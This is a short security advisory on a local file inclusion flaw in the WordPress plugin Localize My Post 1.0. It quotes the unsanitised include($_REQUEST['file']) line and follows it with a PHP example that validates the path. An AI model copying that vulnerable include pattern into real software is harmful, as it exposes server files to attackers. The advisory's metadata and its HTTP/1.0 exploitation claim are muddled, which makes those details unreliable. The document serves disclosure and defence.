Vendor: Localize My Post
By: Manuel Garcia Cardenas
CVSS: 7.5 (HIGH)
Local File Inclusion
CWE: 22
Product Name: Localize My Post
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: 2018-16299
CPE: a:wordpress:localize_my_post:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2018
WordPress Plugin Localize My Post 1.0 – Local File Inclusion
This bug was found in the file /localize-my-post/ajax/include.php:

include($_REQUEST['file']);

The "file" parameter is not sanitized, which allows local files to be included. To exploit the vulnerability, it is only necessary to use version 1.0 of the HTTP protocol to interact with the application.
Mitigation:
Sanitize user input and validate the file path before including it.
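
One way to apply this mitigation to the include() call shown above, as an added example (not the plugin's actual patch): the request value is treated as a bare name, the extension is fixed by the code, and the resolved path must stay inside one directory. BASE_DIR, the "templates" directory and resolve_include() are hypothetical names chosen for illustration.

```php
<?php
// Added example: hardened replacement for include($_REQUEST['file']).
// BASE_DIR and the "templates" directory are assumptions, not the plugin's layout.

const BASE_DIR = __DIR__ . '/templates';

/**
 * Resolve a requested name to a file inside $baseDir, or return null.
 */
function resolve_include(string $requested, string $baseDir = BASE_DIR): ?string
{
    // Accept only a bare name: letters, digits, underscore, hyphen.
    // This rejects "../", absolute paths, NUL bytes and stream wrappers.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $requested)) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }

    // The extension is fixed by the code, never taken from the request.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $requested . '.php');

    // realpath() resolves symlinks; the result must still sit under $base.
    if ($candidate === false
        || strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0
        || !is_file($candidate)) {
        return null;
    }
    return $candidate;
}

$file = $_REQUEST['file'] ?? '';
// $_REQUEST values can be arrays (file[]=x), so check the type first.
$path = is_string($file) ? resolve_include($file) : null;

if ($path === null) {
    http_response_code(400);
    exit('Invalid file parameter');
}
include $path;
```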